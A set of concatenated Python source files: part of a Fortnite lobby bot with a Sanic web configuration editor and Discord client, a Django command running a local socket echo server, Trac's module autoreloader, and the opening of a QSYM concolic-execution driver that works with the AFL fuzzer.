handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter('\u001b[35m %(asctime)s:%(levelname)s:%(name)s: %(message)s \u001b[0m'))
logger.addHandler(handler)
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip'] = "0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if True:
send(l('bot'),f'{l("lobbybot")}: gomashio\n{l("credit")}\n{l("library")}: Terbau',cyan)
text = ""
if data['loglevel'] == 'normal':
text += f'\n{l("loglevel")}: {l("normal")}\n'
elif data['loglevel'] == 'info':
text += f'\n{l("loglevel")}: {l("info")}\n'
elif data['loglevel'] == 'debug':
text += f'\n{l("loglevel")}: {l("debug")}\n'
if data.get('debug',False) is True:
text += f'\n{l("debug")}: {l("on")}\n'
else:
text += f'\n{l("debug")}: {l("off")}\n'
text += f'\nPython {platform.python_version()}\n'
text += f'fortnitepy {fortnitepy.__version__}\n'
text += f'discord.py {discord.__version__}\n'
text += f'Sanic {sanic.__version__}\n'
send(l('bot'),text,green)
if data.get('debug',False) is True:
send(l('bot'),f'[{now()}] {l("debug_is_on")}',red)
send(l('bot'),l("booting"))
dclient = discord.Client()
dclient.owner = []
dclient.isready = False
dclient.boot_time = None
if True: #discord
@dclient.event
async def on_ready() -> None:
loop = asyncio.get_event_loop()
dclient.boot_time = time.time()
dclient_user = name(dclient.user)
send(dclient_user,f"{l('login')}: {dclient_user}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
dclient.isready = True
loop.create_task(status_loop())
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
@dclient.event
async def on_message(message: discord.Message) -> None:
await process_command(message)
async def change_status() -> None:
var = defaultdict(lambda: None)
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"guild_count": len(dclient.guilds),
"get_guild_member_count": get_guild_member_count,
"boot_time": int(time.time() - dclient.boot_time)
}
)
activity = discord.Activity(name=eval_format(data['discord']['status'],var),type=data['discord']['status_type'])
await dclient.change_presence(activity=activity)
async def status_loop() -> None:
while True:
try:
await change_status()
except Exception:
send(dclient.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(30)
select_bool = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')}
]
)
select_bool_none = select(
[
{"value": "True","display_value": l('bool_true')},
{"value": "False","display_value": l('bool_false')},
{"value": "None","display_value": l('bool_none')}
]
)
select_platform = select(
[
{"value": "WIN","display_value": "Windows"},
{"value": "MAC","display_value": "Mac"},
{"value": "PSN","display_value": "PlayStation"},
{"value": "XBL","display_value": "Xbox"},
{"value": "SWT","display_value": "Switch"},
{"value": "IOS","display_value": "IOS"},
{"value": "AND","display_value": "Android"}
]
)
select_privacy = select(
[
{"value": i,"display_value": l(i)} for i in ["public","friends_allow_friends_of_friends","friends","private_allow_friends_of_friends","private"]
]
)
select_status = select(
[
{"value": i,"display_value": l(i)} for i in ["playing","listening","watching"]
]
)
select_matchmethod = select(
[
{"value": i,"display_value": l(i)} for i in ["full","contains","starts","ends"]
]
)
select_loglevel = select(
[
{"value": "normal","display_value": l('normal')},
{"value": "info","display_value": l('info')},
{"value": "debug","display_value": l('debug')}
]
)
select_lang = select(
[
{"value": re.sub(r"lang(\\|/)","",i).replace(".json",""),"display_value": re.sub(r"lang(\\|/)","",i).replace(".json","")} for i in glob("lang/*.json") if "_old.json" not in i
]
)
select_ben_lang = select(
[
{"value": i,"display_value": i} for i in ["ar","de","en","es","es-419","fr","it","ja","ko","pl","pt-BR","ru","tr","zh-CN","zh-Hant"]
]
)
converter = {
"can_be_multiple": CanBeMultiple,
"can_linebreak": CanLinebreak,
"select_bool": select_bool,
"select_bool_none": select_bool_none,
"select_platform": select_platform,
"select_privacy" :select_privacy,
"select_status": select_status,
"select_loglevel": select_loglevel,
"select_lang": select_lang,
"select_ben_lang": select_ben_lang,
"select_matchmethod": select_matchmethod,
"red": Red,
"fix_required": FixRequired
}
for key,value in config_tags.items():
for count,tag in enumerate(value):
config_tags[key][count] = converter.get(tag,tag)
for key,value in commands_tags.items():
for count,tag in enumerate(value):
commands_tags[key][count] = converter.get(tag,tag)
if True: #Web
@app.route("/favicon.ico", methods=["GET"])
async def favicon(request: Request):
return sanic.response.redirect("/images/icon.png")
if os.environ.get("FORTNITE_LOBBYBOT_STATUS") == "-1":
@app.route("/", methods=["GET"])
async def main(request: Request):
return sanic.response.html(
"<h2>Fortnite-LobbyBot<h2>"
"<p>初めに<a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README.md' target='_blank'>README</a>をお読みください</p>"
"<p>First, please read <a href='https://github.com/gomashio1596/Fortnite-LobbyBot/blob/master/README_EN.md' target='_blank'>README<a/></p>"
"<p>質問などは私(Twitter @gomashio1596 Discord gomashio#4335)か<a href='https://discord.gg/NEnka5N' target='_blank'>Discordサーバー</a>まで</p>"
"<p>For questions, Contact to me(Twitter @gomashio1596 Discord gomashio#4335) or ask in <a href='https://discord.gg/NEnka5N' target='_blank'>Discord server</a></p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>ここをクリック</a>してRemix</p>"
"<p><a href='https://glitch.com/edit/#!/remix/fortnite-lobbybot' target='_blank'>Click here</a> to Remix</p>"
"<a href='https://discord.gg/NEnka5N' target='_blank'><img src='https://discordapp.com/api/guilds/718709023427526697/widget.png?style=banner1'></img></a>"
)
elif data["status"] == 0:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
if not corrected.get(key):
if not corrected.get(key).get(key2):
corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
else:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
if request.method == "GET":
return render_template(
"main.html",
l=l,
authenticated=auth.authenticated(request),
data=data
)
elif request.method == "POST":
if auth.authenticated(request):
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
@app.route("/login", methods=["GET", "POST"])
async def login(request: Request):
if auth.authenticated(request):
return sanic.response.redirect("/")
else:
flash_messages = []
if request.method == "GET":
return render_template("login.html", l=l, flash_messages=flash_messages)
elif request.method == "POST":
if request.form.get("password","") == data["web"]["password"]:
r = sanic.response.redirect("/")
auth.login_user(request, r)
return r
else:
flash_messages.append(l('invalid_password'))
return render_template("login.html", l=l, flash_messages=flash_messages)
@app.route("/text")
@auth.login_required
async def web_text_(request: Request):
return sanic.response.json(
{
"text": web_text
}
)
@app.route("/logout")
@auth.login_required
async def logout(request: Request):
r = sanic.response.redirect("/")
auth.logout_user(request, r)
return r
@app.route("/config_editor", methods=["GET", "POST"])
@auth.login_required
async def config_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
if not corrected.get(key):
if not corrected.get(key).get(key2):
corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/commands_editor", methods=["GET", "POST"])
@auth.login_required
async def commands_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("commands.json")
return render_template(
"commands_editor.html",
l=l,
data=data,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
elif request.method == "POST":
flag = False
raw = request.form
data = load_json("commands.json")
corrected = data
for key_,tags in commands_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected[key]:
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
corrected[key] = re.split(r'\r\n|\n',value) if value else []
if flag:
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
with open('commands.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/replies_editor", methods=["GET", "POST"])
@auth.login_required
async def replies_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("replies.json")
return render_template(
"replies_editor.html",
l=l,
data=data,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
elif request.method == "POST":
raw = request.form
corrected = {}
for num in range(0,int(raw["number"][0])):
trigger = raw.get(f"trigger{str(num)}")
if not trigger:
flash_messages_red.append(l('cannot_be_empty'))
break
content = raw.get(f"content{str(num)}")
if not content:
flash_messages_red.append(l('cannot_be_empty'))
break
corrected[trigger] = content
with open('replies.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"replies_editor.html",
l=l,
data=corrected,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
@app.route("/party_viewer", methods=["GET"])
@auth.login_required
async def party_viewer(request: Request):
return render_template(
"party_viewer.html",
l=l,
clients=clients,
enumerate=enumerate
)
@app.route("/clients<num>", methods=["GET", "POST"])
@auth.login_required
async def clients_viewer(request: Request, num: str):
num = int(num)
client = clients[num] if clients[num:num+1] else None
if not client:
sanic.exceptions.abort(404)
flash_messages = []
if request.method == "GET":
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
if request.form.get("command"):
content = request.form["command"][0] if isinstance(request.form["command"],list) else request.form["command"]
message = WebMessage(content, request.cookies.get(auth.cookie_key, 'NoID'), client)
await process_command(message)
result = message.result
if result:
for mes in message.result:
for m in mes.split('\n'):
flash_messages.append(m)
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
return sanic.response.redirect(f"/clients{num}")
@app.route("/clients_info/<num>", methods=["GET"])
@auth.login_required
async def clients_info(request: Request, num: str):
num = int(num)
client = clients[num] if len(clients[num:num+1]) == 1 else None
if not client:
return sanic.response.json(
{
"error": "account_not_exists"
}
)
elif not client.isready:
return sanic.response.json(
{
"error": "account_not_loaded"
}
)
elif not client.party or not client.party.me:
return sanic.response.json(
{
"error": "party_moving"
}
)
else:
return sanic.response.json(
{
"display_name": client.user.display_name,
"id": client.user.id,
"leader": client.party.me.leader,
"banner": search_banner(client.party.me.banner[0]),
"level": client.party.me.banner[2],
"outfit": member_asset(client.party.me, "outfit"),
"outfit_variants": client.party.me.outfit_variants,
"backpack": member_asset(client.party.me, "backpack"),
"backpack_variants": client.party.me.backpack_variants,
"pickaxe": member_asset(client.party.me, "pickaxe"),
"pickaxe_variants": client.party.me.pickaxe_variants,
"contrail": member_asset(client.party.me, "contrail"),
"emote": member_asset(client.party.me, "emote"),
"party_id": client.party.id,
"members": [
{
"display_name": i.display_name,
"id": i.id,
"leader": i.leader,
"banner": search_banner(i.banner[0]),
"level": i.banner[2],
"outfit": member_asset(i, "outfit"),
"outfit_variants": i.outfit_variants,
"backpack": member_asset(i, "backpack"),
"backpack_variants": i.backpack_variants,
"pickaxe": member_asset(i, "pickaxe"),
"pickaxe_variants": i.pickaxe_variants,
"contrail": member_asset(i, "contrail"),
"emote": member_asset(i, "emote")
} for i in client.party.members
]
}
)
@app.route("/boot_switch", methods=["GET", "POST"])
@auth.login_required
async def boot_switch(request: Request):
if request.method == "GET":
return render_template(
"boot_switch.html",
l=l,
len=len
)
elif request.method == "POST":
raw = request.form
for i in raw.keys():
if "on" in i or "off" in i:
break
on_or_off = i
num = int(re.sub(r"on|off","", on_or_off))
on_or_off = i.replace(str(num),"")
loop = asyncio.get_event_loop()
if on_or_off == "on":
clients[num].booting = True
loop.create_task(clients[num].start())
elif on_or_off == "off":
loop.create_task(clients[num].close())
return sanic.response.redirect("/boot_switch")
@app.route("/boot_info", methods=["GET"])
@auth.login_required
async def boot_info(request: Request):
data = {}
for client in clients:
if not client.booting and not client.isready:
data[client.email] = {
"info": "info_closed",
"booting": client.booting,
"isready": client.isready
}
elif client.booting:
data[client.email] = {
"info": "info_booting",
"booting": client.booting,
"isready": client.isready
}
elif client.isready:
data[client.email] = {
"info": "info_ready",
"booting": client.booting,
"isready": client.isready
}
return sanic.response.json(data)
@app.exception(sanic.exceptions.NotFound)
async def not_found(request: Request, exception: Exception):
return render_template("not_found.html", l=l)
@auth.no_auth_handler
async def unauthorized(request: Request, *args, **kwargs):
return sanic.response.redirect("/")
loop = asyncio.get_event_loop()
if data.get('web',{}).get('enabled',True) is True or data.get('status',1) == 0:
loop.create_task(run_app())
Thread(target=dprint,args=(),daemon=True).start()
Thread(target=store_banner_data).start()
if data.get("status",1) != 0:
try:
langs = [
data["search-lang"],
data["sub-search-lang"]
] if data["sub-search-lang"] and data["sub-search-lang"] != data["search-lang"] else [
data["search-lang"]
]
store_item_data(langs)
except Exception:
send(l('bot'),l('api_downing'),red)
items = {}
styles = {}
with ThreadPoolExecutor() as executor:
items_futures = {executor.submit(search_item,lang,mode,data['fortnite'][type_.split(',')[0]],",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for lang in langs for mode in ("name","id") for type_ in ("outfit","backpack,pet","pickaxe","emote,emoji,toy")}
for future,type_ in items_futures.items():
result = future.result()
if result and not items.get(type_):
items[type_] = result[0]
with ThreadPoolExecutor() as executor:
styles_futures = {executor.submit(search_style,data["search-lang"],items.get(type_.split(',')[0],{}).get("id"),",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for type_ in ("outfit","backpack,pet","pickaxe") if data["fortnite"][f"{type_.split(',')[0]}_style"]}
for future,type_ in styles_futures.items():
result = future.result()
if result and not styles.get(type_):
variants = [i["variants"] for i in result if data["fortnite"][f"{type_}_style"] in i["name"]]
if variants:
styles[type_] = variants[0]
for email in data["fortnite"]["email"]:
email = email.strip()
try:
device_auth_details = get_device_auth_details().get(email.lower(), {})
if not device_auth_details:
device_auth_details = loop.run_until_complete(generate_device_auth_and_store(email))
client = Client(
auth=fortnitepy.DeviceAuth(
**device_auth_details
),
default_party_config=fortnitepy.DefaultPartyConfig(
privacy=data['fortnite']['privacy']
),
default_party_member_config=fortnitepy.DefaultPartyMemberConfig(
meta=[
partial(ClientPartyMember.set_outfit, items.get("outfit",{}).get("id",data["fortnite"]["outfit"]), variants=styles.get("outfit")),
partial(ClientPartyMember.set_backpack, items.get("backpack",{}).get("id",data["fortnite"]["backpack"]), variants=styles.get("backpack")),
partial(ClientPartyMember.set_pickaxe, items.get("pickaxe",{}).get("id",data["fortnite"]["pickaxe"]), variants=styles.get("pickaxe")),
partial(ClientPartyMember.set_battlepass_info, has_purchased=True, level=data['fortnite']['tier'], self_boost_xp=data['fortnite']['xpboost'], friend_boost_xp=data['fortnite']['friendxpboost']),
partial(ClientPartyMember.set_banner, icon=data['fortnite']['banner'], color=data['fortnite']['banner_color'], season_level=data['fortnite']['level'])
]
),
platform=fortnitepy.Platform(data['fortnite']['platform'].upper()),
emote=items.get("emote",{}).get("id",data["fortnite"]["emote"])
)
except ValueError:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l('error_while_setting_client'),red,add_d=lambda x:f'>>> {x}')
continue
clients.append(client)
if data.get('status',1) != 0 and bot_ready:
loop.create_task(run_bot())
try:
loop.run_forever()
except KeyboardInterrupt:
sys.exit(1)
|
runteststorage.py
|
from __future__ import unicode_literals
import socket
import multiprocessing
from django.core.management.base import BaseCommand, CommandError
import logging
logger = logging.getLogger(__name__)
class Socket:
'''demonstration class only
- coded for clarity, not efficiency
'''
close_bit = "\x00"
processor = None
connection = None
context = None
address = None
chunk_size = 2048
def __init__(self, connection, address):
print("Connected %r at %r", self.connection, self.address)
self.connection = connection
self.address = address
def run(self):
try:
message = ""
while True:
data = self.connection.recv(self.chunk_size).decode('utf-8')
if data == "":
logger.warning("Socket closed remotely")
break
message += data
if self.close_bit in message:
pos = message.index(self.close_bit)
partial_message = message[0:pos]
message = message[pos+len(self.close_bit):]
logger.debug("Received data %r", partial_message)
self.send(partial_message)
#context.add(data)
except Exception as e:
logger.critical("Problem handling request: %s" % e)
finally:
logger.critical("Closing socket")
self.connection.close()
def send(self, response):
message = response
if not message.endswith(self.close_bit):
message += self.close_bit
logger.debug("Sending: %s", message)
total_sent = 0
while total_sent < len(message):
sent = self.connection.send(message[total_sent:].encode('utf-8'))
if sent == 0:
raise RuntimeError("socket connection broken")
total_sent = total_sent + sent
def handle_client(connection, address):
socket = Socket(connection, address)
socket.run()
class Command(BaseCommand):
args = '<object object ...>'
#help = 'Help text goes here'
def handle(self, *args, **options):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 7720))
sock.listen(1)
while True:
conn, address = sock.accept()
logger.info("Got connection")
process = multiprocessing.Process(target=handle_client, args=(conn, address))
process.daemon = True
process.start()
logger.info("Started process %r", process)
|
autoreload.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2018 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os
import sys
import threading
import time
import traceback
_SLEEP_TIME = 1
def _reloader_thread(modification_callback, loop_callback):
"""When this function is run from the main thread, it will force other
threads to exit when any modules currently loaded change.
:param modification_callback: a function taking a single argument,
the modified file, which is called
every time a modification is
detected
:param loop_callback: a function taking no arguments, which is
called after every modification check
"""
mtimes = {}
while True:
for filename in filter(None, [getattr(module, '__file__', None)
for module in sys.modules.values()]):
while not os.path.isfile(filename): # Probably in an egg or zip file
filename = os.path.dirname(filename)
if not filename:
break
if not filename: # Couldn't map to physical file, so just ignore
continue
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
if not os.path.isfile(filename):
# Compiled file for non-existant source
continue
mtime = os.stat(filename).st_mtime
if filename not in mtimes:
mtimes[filename] = mtime
continue
if mtime != mtimes[filename]:
modification_callback(filename)
sys.exit(3)
loop_callback()
time.sleep(_SLEEP_TIME)
def _restart_with_reloader():
is_win32 = sys.platform == 'win32'
if is_win32:
can_exec = lambda path: os.path.isfile(path) and \
os.path.normpath(path).endswith('.exe')
else:
can_exec = lambda path: os.access(path, os.X_OK)
if os.path.isfile(sys.argv[0]):
args = sys.argv if can_exec(sys.argv[0]) else \
[sys.executable] + sys.argv
elif is_win32 and can_exec(sys.argv[0] + '.exe'):
args = [sys.argv[0] + '.exe'] + sys.argv[1:]
elif os.path.isfile(sys.argv[0] + '-script.py'):
args = [sys.executable, sys.argv[0] + '-script.py'] + sys.argv[1:]
else:
args = [sys.executable] + sys.argv
path = args[0]
if is_win32:
args = ['"%s"' % arg for arg in args]
new_environ = os.environ.copy()
new_environ['RUN_MAIN'] = 'true'
while True:
# This call reinvokes ourself and goes into the other branch of main as
# a new process.
exit_code = os.spawnve(os.P_WAIT, path, args, new_environ)
if exit_code != 3:
return exit_code
def main(func, modification_callback, *args, **kwargs):
"""Run the given function and restart any time modules are changed."""
if os.environ.get('RUN_MAIN'):
exit_code = []
def main_thread():
try:
func(*args, **kwargs)
exit_code.append(None)
except SystemExit as e:
exit_code.append(e.code)
except:
traceback.print_exception(*sys.exc_info())
exit_code.append(1)
def check_exit():
if exit_code:
sys.exit(exit_code[0])
# Lanch the actual program as a child thread
thread = threading.Thread(target=main_thread, name='Main thread')
thread.setDaemon(True)
thread.start()
try:
# Now wait for a file modification and quit
_reloader_thread(modification_callback, check_exit)
except KeyboardInterrupt:
pass
else:
# Initial invocation just waits around restarting this executable
try:
sys.exit(_restart_with_reloader())
except KeyboardInterrupt:
pass
|
qsym.py
|
import ConfigParser
import multiprocessing
import subprocess
import os
import sys
import utils
import shutil
import signal
import tempfile
from utils import bcolors
from utils import mkdir, mkdir_force
import qsym_minimizer as minimizer
from qsym_executor import Executor
DEFAULT_TIMEOUT = 90
TARGET_FILE = utils.AT_FILE
def se_info(s):
print bcolors.HEADER+"[QSYM-Info]"+bcolors.ENDC," {0}".format(s)
def get_afl_cmd(fuzzer_stats):
with open(fuzzer_stats) as f:
for l in f:
if l.startswith("command_line"):
# format= "command_line: [cmd]"
return l.split(":")[1].strip().split()
class Qsym:
def __repr__(self):
return "SE Engine: QSYM Concolic Explorer"
def __init__(self, config, target):
self.jobs = {}
self.started_jobs = set()
self.config = config
self.target = target
self.get_config()
self.pid_ctr = 0
self.minimizer = None
self.make_dirs()
def init_minimizer(self):
if self.minimizer is not None:
return
cmd, afl_path, qemu_mode = self.parse_afl_stats()
self.minimizer = minimizer.TestcaseMinimizer(
cmd, afl_path, self.seed_dir, qemu_mode)
def parse_afl_stats(self):
cmd = get_afl_cmd(os.path.join(self.afl_dir, "fuzzer_stats"))
assert cmd is not None
index = cmd.index("--")
return cmd[index+1:], os.path.dirname(cmd[0]), '-Q' in cmd
@property
def bitmap(self):
return os.path.join(self.seed_dir, "bitmap")
@property
def afl_dir(self):
return os.path.join(self.sync_dir, "slave_000001")
def my_in_dir(self, counter):
return os.path.join(self.seed_dir, counter)
def my_sync_dir(self, instance):
return os.path.join(self.sync_dir, instance, "queue")
def get_config(self):
config = ConfigParser.ConfigParser()
config.read(self.config)
self.name = config.get("qsym conc_explorer", "name")
self.cmd = config.get("qsym conc_explorer", "cmd").replace("@target", self.target).split(" ")
# store the selected inputs from fuzzer queue to be explored by qsym
self.seed_dir = config.get("qsym conc_explorer", "qsym_seed_dir").replace("@target", self.target)
self.sync_dir = config.get("moriarty", "sync_dir").replace("@target", self.target)
try:
self.max_time_per_seed = config.get("qsym conc_explorer", "max_time_per_seed")
except Exception:
self.max_time_per_seed = DEFAULT_TIMEOUT
try:
self.max_mem = config.get("klee conc_explorer", "max_memory")
